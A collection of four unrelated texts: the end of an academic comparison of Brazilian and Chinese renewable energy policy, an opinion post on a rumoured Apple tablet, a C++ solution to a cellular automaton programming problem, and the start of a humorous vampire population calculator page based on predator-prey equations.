Baoding municipality in Hebei further illustrates the proactive role of sub-national governments. Baoding is today home to more than 40 solar power equipment producers. Among them is Yingli Green Energy, the largest solar PV manufacturer in the world in 2014. Yingli was set up in 1998 by a private entrepreneur. In 2001, the Baoding High-Tech Zone Administrative Committee designated solar power technologies and wind turbines as pillar industries of the municipality’s high-tech zone. Between 2003 and 2006, the Administrative Committee helped Yingli Green Energy to “wear a red hat” —meaning that it was formally registered as a local SOE, but it continued to operate independently. Yingli’s new designation helped the company access preferential long-term bank loans.71 Such state corporatist practices meant that Baoding’s solar firms were well positioned to ramp up production quickly when global demand for solar increased in 2004. By 2010, renewables accounted for three quarters of the total $2.9 billion exports from the high-tech zone, and Baoding became known as a clean technology production hub in China.72 This rapid expansion of solar manufacturing was reinforced by regional competition between local governments to establish renewable energy manufacturing bases. More than 300 cities entered the solar PV manufacturing industry, leading to overcapacity of almost two times world demand in solar PV panels.73 In the rush to attract solar manufacturers, hundreds of renewable industrial parks were set up by local governments between 2003 and 2006. The creation of renewable industrial parks also offered additional local revenues to local governments through real estate development.74 In one municipality in Jiangsu Province, for example, four of nine counties listed solar and wind as their top two priority sectors and created industrial parks to spearhead their development, many of which stayed largely empty as they could not all attract renewable manufacturers.75 Anhui and Shanxi also had similar failed infrastructure investments.76 This headlong rush into renewables is partly an adverse effect of a cadre evaluation system that predisposes local officials to place excessive emphasis on achieving short-term economic growth targets.77 Since 2009 policy-makers have begun to address the large imbalance between supply- and demand-side measures.78 In 2009, two large-scale subsidy programs were initiated to promote on-grid deployment of solar energy. The Rooftop Subsidy Program (2009) provides RMB15/W for rooftop systems and RMB 20/W for Building Integrated Photovoltaics (BIPV) systems, while the Golden Sun Demonstration Program (2009) provides a 50-percent subsidy for on-grid systems and 70-percent subsidy for off-grid systems.79 Large-scale investments in solar installations were also driven by the National Energy Administration’s (NEA) two rounds of public auctions for solar-powered projects in 2009 and 2010. These auctions offered successful bidders 25-year operational rights with on-grid prices and also opened the door for numerous SOEs to join the sector.80 When prices dropped, the NDRC responded to lobbying pressure from manufacturers and suppliers and established China’s first FIT scheme for solar PV development in 2011, offering a tariff of RMB 1/kWh for new approved projects.81 In 2013, the State Council, China’s highest decision-making unit in the executive branch of the government, issued a new statement stressing the importance of the domestic solar PV market.82 In quick succession, various institutions, including the NEA, the Ministry of Finance, the Chinese Development Bank, and the State Grid Corporation of China issued relevant supporting policies, and plans were made to add another 10 GW during 2013–2015.83 Local governments actively introduced additional demand-side subsidies to supplement national demand-side interventions. For example, some provinces, such as Shandong and Liaoning, introduced supplemental tariffs to encourage wind and solar installations, offering, in addition to existing national tariffs, an extra RMB 0.10–0.11/kWh for wind and an RMB 0.05–0.25/kWh for solar.84 Other provinces opted to offer additional tariffs or supplemental tax preferences to wind and solar developers on a project-by-project basis, giving developers a lot of leverage at the bargaining table. The recent switch in focus to solar PV installation can be explained by the combination of ongoing trade disputes with the EU and US and a struggling solar manufacturing industry. The EU and US initiated anti-dumping and countervailing investigations against Chinese solar PV products in 2011. At the same time, during the world financial crisis, foreign solar PV markets shrank as countries such as Germany cut subsidies. With the rush to solar at local levels, problems of industrial overcapacity and poor quality came to light. Government officials often opted for low-hanging fruit by investing in and supporting firms that focused just on simple solar mass production. As a result, by 2009 the market was flooded with simple solar PV modules with low conversion efficiency.85 The industry-wide oversupply drove down the prices of solar modules, while at the same time spot prices for silicon rose from$32 per kilogram in 2004 to \$450 per kilogram in 2007.86 The result was a severe crisis in the domestic market, leading to layoffs and bankruptcies. Many solar manufacturers turned to local governments and banks for rescue packages, and local government officials were often only too willing to bail them out in order to protect local jobs and tax revenues, avoid damage to the government’s reputation, and secure their own career promotion in the short term. The large-scale demand-based incentives resulted in additional solar PV installations of 13 GW in 2013 alone, and jobs in solar installation tripled in 2013 and 2014.87 This boost in domestic installations has since helped Chinese solar manufacturers to return to rapid growth and some manufacturers even added production capacity in 2013.
In summary, the institutions of state corporatism help explain the marked preference for supply-side interventions in China. Local state institutions were particularly important catalysts of the meteoric rise of Chinese solar, as officials eyed the benefits for economic growth, trade, employment, and prestige. Demand-side interventions were employed late and employed primarily to save domestic solar manufacturers from bankruptcy and to reduce dependence on overseas markets.
## Conclusions
The policy outcomes in renewable energy development differ markedly in Brazil and China. In Brazil, renewable electricity advances are more modest including some successes in wind turbine manufacturing, with the number of component manufacturers increasing and generation growing quickly. Yet very little deployment or manufacturing activities developed for solar energy, despite abundant solar resources in Brazil. By contrast, over the same period, China gained world leadership in wind and solar manufacturing and deployment.
We argue that the observed difference in renewable energy outcomes is partly explained by variation in state–business relations in Brazil and China. Brazil’s public–private partnership model and China’s state corporatist model are different approaches to aligning interests between the state and market players. The two approaches presented mirror images in their implications for renewable energy development.
In Brazil, the public–private partnership approach encouraged a more coordinated and deliberate start to renewable energy generation that worked best for wind power. The Proinfa program used generous tariffs to draw private actors into wind production for Brazilian consumers and offered some market protection to encourage local production of wind turbines and components. Ongoing reserve auctions and subsidized finance from BNDES succeeded in drawing firms to both generation and industrial production, but also disciplined the industry by subjecting it to fierce price competition in the auctions and strict oversight of BNDES’ lending. Over time these allowed Brazil to develop a fairly lean, if not fully globally competitive and innovative, wind industry that helps meet national demand.
For solar power, the requirement that prices, generation, and parts production all intersect in ways that meet both public and private aims has, so far, failed. Many policy tools cannot be considered, either because private actors cannot be forced to participate or because public actors have been required to make fairly short-term calculations based on market-based fundamentals. Strong environmental interests in solar production and good material foundations for such an industry have run into limits imposed by the contradictions between price and domestic production aims.
In China, the state corporatist model gives central and local governments a greater number and variety of levers to promote solar and wind energies. Top managers in SOEs are part of the same annual cadre evaluation system as public officials, making it easier for central and local governments to steer enterprise behavior. Moreover, the banking system is dominated by a few large state-owned banks, which financed state-owned or state-connected enterprises in renewables. In China’s decentralized authoritarian political structure, local governments actively support the expansion of the wind and solar industries, as the examples of Baoding and Changsha illustrate.
Yet China’s state-corporatist approach also poses serious challenges for renewable energy development. Excessive interventions by local governments and local branches of state-owned banks sometimes distorted central government plans and policies. The easy provision of bank loans at local levels resulted in huge amounts of short-term debt, much of which seems destined to become non-performing loans.88 Such easy access to financing combined with the lack of hard budget constraints resulted in large-scale industrial overcapacity and, subsequently, to companies’ deteriorating finances.89
The pathologies of Chinese state corporatism are partly due to abiding interest misalignments between central and local levels of government. As we have seen, local officials focused inordinately on the short-term benefits of renewables and rushed headlong into the sector without due heed to market conditions, giving rise to a boom-and-bust cycle. This is partly an effect of deeply embedded Communist Party institutions encouraging tournament-style competition between local officials,90 but it also is a familiar downside of the state-centered approach, which has led to over-investment in other countries.
In sum, while China’s state-dominated model provided the institutional foundations of marked success in renewables development, the approach has come at significant cost. In particular, the prioritization of manufacturing renewables over the domestic demand for renewable energy itself created numerous undesirable outcomes, as the deployment of renewable energy was initially sacrificed in the drive to build up a strong renewables production sector.
For other developing countries, the experiences of Brazil and China illustrate the many tradeoffs and dilemmas that grid-based renewable electricity raises. Building wind and solar generation plants continues to be more expensive than fossil fuel plants for most countries, although the last decade of developments in Brazil and especially China have changed those calculations remarkably. For countries that want to balance higher generation costs with the economic gains of adding a dynamic new industry that produces components, the experiences of these two giants suggest they will face a delicate balancing act between these two aims.
## Notes
1.
Harrison and Kostka 2014; Hochstetler and Viola 2012.
2.
Steinberg and VanDeveer 2012.
3.
Andrews-Speed 2012; Leite 2009.
4.
See Purdon’s introduction to this special issue. See also Hall 1997; Steinberg and Vandeveer 2012.
5.
See the summary in Fiorino 2011.
6.
For example, Crepaz 1995; Poloni-Staudinger 2008; Scruggs 2003; Vogel 1986.
7.
Victor and Heller 2007, 23–24.
8.
Gratwick and Eberhard 2008; Victor and Heller 2007, 6–7.
9.
Erdogdu 2014, 1.
10.
Kessides 2012, 80.
11.
Gratwick and Eberhard 2008; Kessides 2012; Victor and Heller 2007.
12.
Erdogdu 2014, 7.
13.
Leite 2009.
14.
Landry 2008.
15.
Oi 1992.
16.
Oi 1992.
17.
EIA 2014.
18.
Barros, et al. 2011.
19.
Leite 2009, 62; Zhang, Andrews-Speed and Zhao 2013b, 335.
20.
Fischer 2012.
21.
Zhang et al. 2013a, 325; MAKE consulting 2014.
22.
Gosens and Lu 2014, 310.
23.
Brazilian Agency of Industrial Development – ABDI 2014, 11.
24.
IRENA 2014, 4.
25.
Zhang and He 2013, 395.
26.
Zhang and He 2013, 395.
27.
Interview with Elbia Melo, Chief Executive Officer of the Associação Brasileira de Energia Eólica (ABEEólica, Brazilian Wind Energy Association), São Paulo, July 22, 2014. Melo was chief economist in the Ministry of Mines and Energy while the Proinfa program was being developed.
28.
Presidência da República 2002.
29.
Presidência da República 2003.
30.
Interview Melo 2014.
31.
Presidência da República 2003.
32.
Governo do Brasil 2003, 10.
33.
Interview with five members of the BNDES Infrastructure and Structuration of Projects sectors, Rio de Janeiro, June 2012; Telephone interview with Sérgio Weguelin, then Superintendent of the Environment sector of BNDES, June 2011.
34.
Hochstetler and Montero 2013, 1491.
35.
Interview BNDES.
36.
Hochstetler and Montero 2013, 1485.
37.
Interview Melo 2014; Interview with Milton Pinto, representative of the Centro de Estratégias em Recursos Naturais e Energia (CERNE), Natal, July 17, 2014.
38.
Lucas, Ferroukhi, and Hawila 2013, 18–19.
39.
Lucas, Ferroukhi, and Hawila 2013, 22.
40.
Melo 2013, 131.
41.
Melo 2013, 125.
42.
Interview with representative of CPFL Renováveis, São Paulo, July 24, 2014; Interview with representative of Bons Ventos da Serra, Fortaleza, July 14, 2014.
43.
Lucas, Ferroukhi, and Hawila 2013, 16, 20.
44.
Dutra and Szklo 2008, 69.
45.
Dutra and Szklo 2008, 73.
46.
Brazilian Agency for Industrial Development – ABDI 2014, 11.
47.
Interview with Eduardo Tosta, Project Specialist, Agência Brasileira de Desenvolvimento Industrial, September, 2014.
48.
Interview Melo 2014.
49.
Melo 2013, 130.
50.
BNDES 2012.
51.
Melo 2013.
52.
EPE 2012, 1.
53.
Interview with official of Greenpeace Brasil, São Paulo, July 22 2014; Interview Melo 2014.
54.
EPE 2012, 17–18.
55.
Interview BNDES 2012.
56.
EPE 2012, 1–3.
57.
Interview CFPL Renováveis 2014.
58.
Zhang, Andrews-Speed and Zhao 2013b, 335.
59.
Harrison and Kostka 2014; Kostka 2015.
60.
Zhang, Andrews-Speed and Zhao 2013b, 335.
61.
Yang et al. 2012 quoted in Zhang, Andrews-Speed, and Zhao 2013b, 338.
62.
Gosens and Lu 2014, 312.
63.
Lewis 2013.
64.
GWEC 2012, 70.
65.
Interviews with government officials from the Changsha Municipal Development and Reform Commission (DRC), Science and Technology Bureau, Construction Bureau, and Environmental Protection Bureau (EPB), Changsha, September 2010.
66.
Becker and Fischer 2013, v449; Fischer 2012, 141.
67.
Zhang and He 2013, 396.
68.
China Builds High Wall to Guard Energy Industry, New York Times, July 13, 2009.
69.
Dialogue with Shi Zhengrong 2010.
70.
LDK Annual Reports quoted in Zhang 2014, 28; Energy Trend 2013.
71.
Zhang 2014, 38.
72.
Shin 2014.
73.
Zhang et al. 2013c, 348.
74.
Fischer 2014.
75.
Interviews with government officials, various Science and Technology Bureaus, Jiangsu, June 2012.
76.
Interviews with the standing vice manager at an industrial park administration committee, Anhui province, January 2007, and with government officials from the DRC in Datong, Shanxi province, September 2011.
77.
Eaton and Kostka 2014.
78.
Fischer 2012.
79.
Zhang and He 2013, 397.
80.
Fischer 2014, 92.
81.
Zhang and He 2013, 398.
82.
Government of China. 2013.
83.
For more details on these supporting policies, see Zhang 2014, 35.
84.
Deutsche Bank 2012.
85.
Gosens and Lu 2014, 310.
86.
Trina Solar Annual Report, quoted in Zhang 2014, 25.
87.
IRENA 2014, 12.
88.
Zhang 2014, 24.
89.
Zhang 2014, 44.
90.
Zhou 2007.
## References
Andrews-Speed
,
Philip
.
2012
.
The Governance of Energy in China
.
London
:
Palgrave Macmillan
.
Barros
,
N.
,
J.J.
Cole
,
L.J.
Tranvik
,
Y.T.
Prairie
,
D.
Bastviken
,
V.L.M.
Huszar
,
P.
Del Giorgio
, and
F.
Roland
.
2011
.
Carbon Emission from Hydroelectric Reservoirs Linked to Reservoir Age and Latitude
.
Nature Geoscience
4
(
9
):
593
596
.
Becker
,
Bastian
, and
Fischer
,
Doris
.
2013
.
Promoting Renewable Electricity Generation in Emerging Economies
.
Energy Policy
56
:
446
455
.
Banco Nacional de Desenvolvimento Econômico e Social (BNDES)
.
2012
.
Anexo 1- Etapas Fisicas e Conteudo Local que Devera Ser Cumpridos Pelo Fabricante
. .
Brazilian Agency for Industrial Development – ABDI
.
2014
.
Mapping of Brazil’s Wind Power Industry Productive Chain
.
Brasília
:
ABDI, Ministério de Desenvolvimento, Indústria e Comercio
.
Crepaz
,
Markus
.
1995
.
Explaining National Variations of Air Pollution Levels: Political Institutions and their Impact on Environmental Policy-Making
.
Environmental Politics
4
(
3
):
391
414
.
Deutsche Bank
.
2012
.
Scaling Wind and Solar Power in China: Building the Grid to Meet Targets
.
February. Available at www.top1000funds.com/wp…/China_Wind_and_Solar-Feb20121.pdf, accessed July 9, 2014
.
Dialogue with Shi Zhengrong
.
2010
.
Dutra
,
Ricardo Marques
, and
Alexandre Salem
Szklo
.
2008
.
Incentive Policies for Promoting Wind Power Production in Brazil: Scenarios for the Alternative Energy Sources Inventive Program
.
Renewable Energy
33
(
1
):
65
76
.
Eaton
,
Sarah
, and
Genia
Kostka
.
2014
.
Authoritarian Environmentalism Undermined? Local Leaders’ Time Horizons and Environmental Policy Implementation in China
,
The China Quarterly
218
:
359
380
.
Energy Trend
.
2013
.
2012 Year Financial Evaluation: Solar Industries Continue to Face Financial Problems
.
Available at: http://pv.energytrend.com/research/20130524-5261.html, accessed April 15, 2015
.
EPE
.
2013
.
Plano Decinal de Expansão da Energia 2022
.
Brasília
:
Ministério de Minas e Energia, Empresa de Pesquisa Energética
.
EPE
.
2012
.
Análise da Inserção da Geração Solar na Matriz Elétrica Brasileira
.
Rio de Janeiro
:
Ministério de Minas e Energia, Empresa de Pesquisa Energética
.
.
2014
.
Country Report China
.
February 4. Available at http://www.eia.gov/countries/cab.cfm?fips=ch, accessed July 9, 2014
.
.
2011
.
International Energy Statistics
,
http://www.eia.gov/countries/data.cfm, accessed August 3, 2014
.
Erdogdu
,
Erkan
.
2014
.
Investment, Security of Supply and Sustainability in the Aftermath of Three Decades of Power System Reform
.
Renewable and Sustainable Energy Reviews
31
:
1
8
.
Fiorino
,
Daniel J.
2011
.
Explaining National Environmental Performance: Approaches, Evidence and Implications
.
Policy Sciences
44
(
4
):
367
389
.
Fischer
,
Doris
.
2012
.
Challenges of Low Carbon Technology Diffusion: Insights from Shifts in China’s Photovoltaic Industry Development
.
Innovation and Development
2
(
1
):
131
146
.
Fischer
,
Doris
.
2014
.
Green Industrial Policies in China—the Example of Solar Energy
. In
Green Industrial Policies in Emerging Countries
, edited by
Anna
Pegels
.
London
:
Routledge
.
GWEC (Global Wind Energy Council)
.
2012
.
China Wind Power Outlook 2012
. .
GWEC (Global Wind Energy Council)
.
2014
.
Global Installed Wind Power Capacity Regional Distribution
. .
Gosens
,
Jorrit
, and
Yonglong
Lu
.
2014
.
Prospects for Global Market Expansion of China’s Wind Turbine Manufacturing Industry
.
Energy Policy
67
:
301
318
.
Government of China
.
2013
.
State Council on promoting the healthy development of the photovoltaic industry (guowuyuan guanyu cujin guangfu chanye jiankang fazhan de ruogan yijian) (2013), Document No. 24
.
Available at: http://www.gov.cn/zwgk/2013-07/15/content_2447814.htm, accessed April 15, 2015
.
Governo do Brasil
.
2003
.
Diretrizes de Polítical Industrial, Tecnológico e de Comércio Exterior
.
Brasília
:
Governo Luiz Inácio Lula da Silva
.
Gratwick
,
Katharine Nawaal
, and
Anton
Eberhard
.
2008
.
Demise of the Standard Model for Power Sector Reform and the Emergence of Hybrid Power Markets
.
Energy Policy
36
(
10
):
3948
3960
.
Hall
,
Peter A.
1997
.
The Roles of Interests, Institutions and Ideas in the Comparative Political Economy of the Industrialized Nations
. In
M.I.
Lichbach
and
A.S.
Zuckerman
, eds.
Comparative Politics: Rationality, Culture, and Structure
.
Cambridge
:
Cambridge University Press
.
Harrison
,
Tom
, and
Kostka
,
Genia
.
2014
.
Balancing Priorities, Aligning Interests: Developing Mitigation Capacity in China and India
.
Comparative Political Studies
47
(
3
):
449
479
.
Hochstetler
,
Kathryn
, and
Alfred P.
Montero
.
2013
.
The Renewed Developmental State: The National Development Bank and the Brazil Model
.
Journal of Development Studies
49
(
11
):
1484
1499
.
Hochstetler
,
Kathryn
, and
Eduardo
Viola
.
2012
.
Brazil and the Politics of Climate Change: Beyond the Global Commons
.
Environmental Politics
21
(
5
):
753
771
.
IRENA (International Renewable Energy Agency)
.
2014
.
Renewable Energy and Jobs: Annual Review 2014
,
May. Available at http://www.irena.org/REjobs/, accessed July 9, 2014
.
Kostka
,
Genia
.
2015
.
Command Without Control: The Case of China’s Environmental Target System
.
Regulation & Governance
,
doi: 10.1111/rego.12082, forthcoming
.
Kessides
,
Ioannis N.
2012
.
The Impacts of Electricity Reforms in Developing Countries
.
The Electricity Journal
25
(
6
):
79
88
.
Landry
,
Pierre F.
2008
.
Decentralized Authoritarianism in China
.
New York
:
Cambridge University Press
.
Leite
,
Antônio Dias
.
2009
.
Energy in Brazil: Towards a Renewable Energy Dominated System
.
London
:
Earthscan
.
Lewis
,
Joanna I.
2013
.
Green Innovation in China: China’s Wind Power Industry and the Global Transition to a Low-Carbon Economy
.
New York
:
Columbia University Press
.
Lucas
,
Hugo
,
Rabia
Ferroukhi
, and
Diala
Hawila
.
2013
.
Renewable Energy Auctions in Developing Countries
.
Abu Dhabi
:
International Renewable Energy Agency
.
MAKE Consulting
.
2014
.
Top Fifteen Wind Turbine Suppliers of 2013
. .
Melo
,
Elbia
.
2013
.
Fonte Eólica de Energia: Aspectos de Inserção, Tecnologia e Competitividade
.
27
(
77
):
125
142
.
Oi
,
Jean C.
1992
.
Fiscal Reform and the Economic Foundations of Local State Corporatism in China
.
World Politics
45
:
99
126
.
Poloni-Staudinger
,
Lori M.
2008
.
Are Consensus Democracies More Environmentally Effective?
Environmental Politics
17
(
3
):
410
430
.
Presidência da República
.
2002
.
LEI 10.438 de 26 de abril de 2002
.
Available at http://www.planalto.gov.br/ccivil_03/leis/2002/L10438.htm, accessed April 15, 2015
.
Presidência da República
.
2003
.
LEI 10.762 de 11 de novembro de 2003
. .
Scruggs
,
Lyle
.
2003
.
Sustaining Abundance: Environmental Performance in Industrial Democracies
.
Cambridge
:
Cambridge University Press
.
Shin
,
Kyoung
.
2014
.
An Emerging Architecture of Local Experimentalist Governance in China: A Study of Local Innovations in Baoding, 1992–2012
.
Unpublished PhD dissertation, Cambridge, MA: MIT
.
Steinberg
,
Paul F.
, and
Stacy D.
VanDeveer
.
2012
.
Comparative Environmental Politics: Theory, Practice, and Politics
.
Cambridge, MA
:
MIT Press
.
Victor
,
David
, and
Thomas C.
Heller
.
2007
.
Introduction and Overview
. In
The Political Economy of Power Sector Reform: The Experience of Five Major Developing Countries
, edited by
David
Victor
and
Thomas C.
Heller
.
Cambridge
:
Cambridge University Press
.
Vogel
,
David
.
1986
.
National Styles of Regulation: Environmental Policy in Green Britain and the United States
.
Ithaca
:
Cornell University Press
.
Zhang
,
Sufang
, and
Yongxiu
He
.
2013
.
Analysis on the Development and Policy of Solar PV Power in China
.
Renewable and Sustainable Energy Reviews
21
:
393
401
.
Zhang
,
Sufang
,
Xiaoli
Zhao
,
Philip
Andrews-Speed
, and
Yongxiu
He
.
2013a
.
The Development Trajectories of Wind Power and Solar PV Power in China: A Comparison and Policy Recommendations
.
Renewable and Sustainable Energy Reviews
26
:
322
331
.
Zhang
,
Sufang
,
Philip
Andrews-Speed
, and
Xiaoli
Zhao
.
2013b
.
Political and Institutional Analysis of the Successes and Failures of China’s Wind Power Policy
.
Energy Policy
56
:
331
340
.
Zhang
,
Sufang
,
Philip
Andrews-Speed
,
Xiaoli
Zhao
,
Yongxiu
He
.
2013c
.
Interactions Between Renewable Energy Policy and Renewable Energy Industrial Policy: A Critical Analysis of China’s Policy Approach to Renewable Energies
.
Energy Policy
62
:
342
353
.
Zhang
,
Yuan
.
2014
.
Chinese Government Intervention in the Development of Chinese Photovoltaic Industry
.
Unpublished Master Thesis, University of Waterloo
.
Zhou
,
Li-an
.
2007
.
Governing China’s Local Officials: An Analysis of Promotion Tournament Model
.
Economic Research Journal
2007
(
7
):
36
50
.
## Author notes
*
Hochstetler’s research was funded by the Social Sciences and Humanities Research Council of Canada. She thanks J. Ricardo Tranjan for research assistance. Kostka’s research was funded by the Karl Schlecht Foundation. We would like to thank the editors of this special issue, especially Mark Purdon, for their suggestions, as well as the anonymous reviewers and Sarah Eaton for helpful comments.
|
# Take Two Tablets and Call Me in a Month
Yes, everyone is going ape over the Mac tablet design that has (re)surfaced. But then, people went ape over every single iteration of the iMac, the iPod and pretty much any other Apple product that kicked off (or hinted at) a new form factor, so that's only to be expected.
What people seem to be forgetting is that, if it exists at all (and if it is ever brought to market, which is the biggest issue - tablet designs or mini-PCs like the OQO are a dime a dozen) it's bound to cost more or less the same as an iBook (a little less in fact, if it's really only 8 inch wide).
Fab costs are likely to be, say, around 60-70% that of an iBook, and that's estimated mostly on parts (and heavily slanted due to the smaller screen size, which is a major factor in component costs for one of these things).
Now assuming all this, placing it at US$999 would be on top of the iBook price range. Higher would be pointless, unless the goal was to only sell a couple of hundred. (There is also the option of this being some sort of new "iMac Mini", which would bump up the price point significantly, but let's run with the tablet idea for a bit.) Okay, for the sake of argument, let's make it US$799, assuming that if Apple followed a linear pricing/product placement strategy (which it often doesn't) it would have to be somewhere in between an iPod and an iBook.
Yep. That's the real question. I guess it would depend heavily on what it could do besides acting as a remote Mac display or an iTunes remote.
And I bet that, like most of Apple's modern gear, it would be squarely aimed at the home market, and integrated into the Apple "digital entertainment hub" - so no useful corporate functionality except wireless web surfing and note taking, which hardly justify even a quarter the price of a Windows Tablet PC.
So, home use would mean surfing the net, streaming music (and maybe video, if the new H.264 codec can run on it without flattening the batteries), maybe browsing iPhoto albums or (if Inkwell is good enough) sending short notes via e-mail. Paired with an Airport Express, it would be a pretty complete home entertainment system.
(By the way, the "it might also act as a phone" rumors floating around are nothing short of ridiculous. If the thing is going to act as a phone, the tablet form factor is one of the worst possible imaginable.)
Assuming it exists at all (always a nice thing to keep in mind), would you pay US\$799 for a gadget that (as far as we know) has no compelling application to foster its adoption?
More to the point, I don't see myself spending that much money for yet another Apple one-off (or "classic model", as initial revisions are nearly always dubbed a few years down the road) that would most likely be either dead or obsolete in a year's time.
Now go back and think of it actually being some sort of "iMac Mini" costing even more, and you see why I'm not exactly keen on it.
Of course, if might be as wondrous as the Newton (which I would probably still use today if I had kept one), and all the points I've made above will wither away in a flood of coolness...
|
# UVA Live 3704 Cellular Automaton (矩阵快速幂)
## Description
A cellular automaton is a collection of cells on a grid of specified shape that evolves through a number of discrete time steps according to a set of rules that describe the new state of a cell based on the states of neighboring cells. The order of the cellular automaton is the number of cells it contains. Cells of the automaton of order n are numbered from 1 to n.
The order of the cell is the number of different values it may contain. Usually, values of a cell of order m are considered to be integer numbers from 0 to m−1.
One of the most fundamental properties of a cellular automaton is the type of grid on which it is computed. In this problem we examine the special kind of cellular automaton — circular cellular automaton of order n with cells of order m. We will denote such kind of cellular automaton as n,m − automaton.
A distance between cells i and j in n,m-automaton is defined as min(|i − j|,n −|i − j|). A denvironment of a cell is the set of cells at a distance not greater than d.
On each d-step values of all cells are simultaneously replaced by new values. The new value of cell i after d-step is computed as a sum of values of cells belonging to the d-enviroment of the cell i modulo m.
The following picture shows 1-step of the 5,3-automaton.
## Input
The input file contains several test cases, each of them consists of two lines, as described below.
The first line of the input contains four integer numbers n, m, d, and k (1 ≤ n ≤ 500, 1 ≤ m ≤ 1000000, 0 ≤ d < n 2 , 1 ≤ k ≤ 10000000).
The second line contains n integer numbers from 0 to m−1 — initial values of the automaton’s cells.
## Output
For each test case, write to the output, on a line by itself, the values of the n,m-automaton’s cells after k d-steps.
## Sample Input
5 3 1 1
1 2 2 1 2
5 3 1 10
1 2 2 1 2
## Sample Output
2 2 2 2 1
2 0 0 2 2
## 思路
$$$$A =\begin{bmatrix} 1&1&0& \cdots\ &0&1 \\ 1&1&1&0&\cdots\ & 0 \\ 0&1&1&1&0&\cdots\ \\ \cdots\ &0&1&1&1&0 \\ 1&\cdots\ &0&0&1&1 \\ 1&1&\cdots\ &0&0&1 \\ \end{bmatrix}$$$$
## AC 代码
#include<bits/stdc++.h>
using namespace std;
typedef long long LL;
LL n,m,d,k;
LL np[500][500];
int idx=0;
struct marx
{
int tot;
marx()
{
tot=idx++;
}
marx mult(const marx&a,const marx&b)
{
marx ans = marx();
for(int i=0; i<n; i++)
{
LL num=0;
for(int j=0; j<n; j++)
{
num=(num+(np[a.tot][(j-i+n)%n]*np[b.tot][j])%m)%m;
}
np[ans.tot][i]=num;
}
return ans;
}
marx mul(const marx&a,const marx&b)
{
marx ans=marx();
for(int i=0; i<n; i++)
for(int j=0; j<n; j++)
np[ans.tot][i]=(np[ans.tot][i]+(np[a.tot][j]*np[b.tot][(j-i+n)%n])%m)%m;
return ans;
}
};
marx mult(marx a,LL n)
{
marx ans=marx();
np[ans.tot][0]=1;
while(n)
{
if(n&1)ans=ans.mul(ans,a);
a=a.mul(a,a);
n>>=1;
}
return ans;
}
int main()
{
ios::sync_with_stdio(false);
while(cin>>n>>m>>d>>k)
{
memset(np,0,sizeof(np));
idx=0;
marx ans = marx();
for(int i=0; i<n; i++)
cin>>np[ans.tot][i];
marx ap = marx();
for(int j=-d; j<=+d; j++)
np[ap.tot][(j+n)%n]=1;
ans=ans.mult(mult(ap,k),ans);
for(int i=0; i<n; i++)
cout<<np[ans.tot][i]<<((i!=n-1)?" ":"\n");
}
return 0;
}
|
# Vampire Apocalypse Calculator
Created by Dominik Czernia, PhD
Reviewed by Bogna Szyk and Jack Bowater
Last updated: Feb 09, 2023
Welcome to the vampire apocalypse calculator, you lovely, tasty human. This sophisticated tool is based on the predator - prey model, a model which successfully describes the dynamics of ecosystems, chemical reactions, and even economics. Now it's time to use it to answer the question: what if vampires were among us? You might think we're joking, but the facts are clear. If we compare the actual (red points) to the exponential growth model (blue line), it reveals there are some hidden causes preventing the expansion of humanity.
We could theorize all day why this is, but there's one idea we'd like to check and discuss: vampires. Are you ready to unveil the ancient mysteries of vampirism?
## What is vampirism?
Nearly every culture around the world has its blood-drinking creature. The ancient world had the female demons Lilith (Babylonia) and Lamia (Greece). In Africa, the Ewe folklore believes in Adze - a vampiric being that can take the form of a firefly. Chilean Peuchen was a gigantic flying snake that could paralyse, and, in Asia, Penanggal was a woman who broke a pact with the devil and has been forever cursed to become a bloodsucking demon. So, why is it that vampires are known around the globe? Isn't it suspicious?
What about the vampires themselves? They are usually believed to be undead creatures with supernatural powers; they don't age, can fly, and can fully regenerate from almost any wound. They have a taste for human blood, but are afraid of sunlight, silver, religious symbols, and garlic. Vampires can be killed by decapitation or a wooden stake through the heart. The last important thing is that vampires can't reproduce - they can only turn a human into a vampire.
## How to use the vampire apocalypse calculator?
What if vampires were among us? The vampire apocalypse calculator allows you to check how humanity would fair in some selected scenarios from popular books and movies, as well as creating your own story from scratch. It's your decision! We present the result in the form of a graph that plots how three populations change: humans (blue points), vampires (red points), and vampire slayers (yellow points). Adjust the graph if needed by setting an appropriate time scale (days, weeks, months, years, decades, centuries) and type of chart (linear or logarithmic).
The vampire apocalypse calculator performs real-time numerical calculations that might sometimes be a little demanding, depending on your machine specifications. But, please, be understanding! The algorithm can receive up to 13 parameters from the three species:
1. Humans - if not interrupted by vampires, their population size will grow exponentially. The available settings are the initial population, the probability of turning into a vampire when attacked, and annual population growth. Humans' unique ability is to grow faster when their population becomes smaller than its starting value.
2. Vampires - bloodthirsty humanoids that hunt people and turn them into new vampires. The available parameters are their initial population and their aggression level towards humans and slayers. You can make vampires smarter with their special ability. When activated, vampires will refrain from killing too many humans, so they do not lose their only source of blood.
3. Vampire slayers - an organization of brave people with one objective: save the world from vampiric domination. The available parameters are their initial population, annual recruitment speed, aggression level towards vampires, and vampire transformation probability. They cannot afford their member's salaries if the entire world is a vampire hunter, so you can turn on the vampire slayers special ability to limit the maximum size of the organization.
Go ahead and test our vampire apocalypse calculator! If you find a set of parameters that creates an incredible story, don't hesitate and share it with your friends and us. You can use the Send this result button just below the graph.
For example, let's build a custom scenario (Select a scenario: Custom). A city with one million people (Humans - Initial population: 1,000,000) that is growing every year at typical speed (Humans - Annual population growth: current (1% per year)). Suddenly, 200 of vampires (Vampires - Initial population: 200) invaded it and started attacking people from time to time (Vampires - vs. humans: common attacks) having the human-vampire transformation probability of one half (Humans - Transformation probability: 50%). What can you see on the resulting graph? Actually, not much; the time scale is too low. After increasing it (Time scale: decades), the picture is entirely different! You can see that mankind will be wiped out after about 48 decades. Now, how many vampire slayers would you need to save humanity? Try playing with different options!
🙋 Why not create your own Minecraft vampire world? Take a look at the Minecraft circle generator or the Nether portal calculator to help you with some of the details! 🦇
## Predator - prey Model: Lotka - Volterra equations
Italian astronomer and physicist Galileo Galilei (known for his experiments with falling bodies and inclined planes) once said Mathematics is the language in which God has written the universe. Indeed, scientists all around the world try to find suitable mathematical equations that describe the natural world properly.
If you consider a simple ecosystem with two species, e.g., foxes and rabbits, the Lotka - Volterra equations generally work just fine. They are also called the predator - prey model. Why? Let's stick with our example. The population of rabbits can peacefully live and reproduce if we assume that they have access to an unlimited source of food in the forest. On the other hand, foxes are carnivorous, so their population size depends on the accessibility of food, i.e., rabbits. Can you see where the problem is? More rabbits mean more foxes, but more foxes mean fewer rabbits.
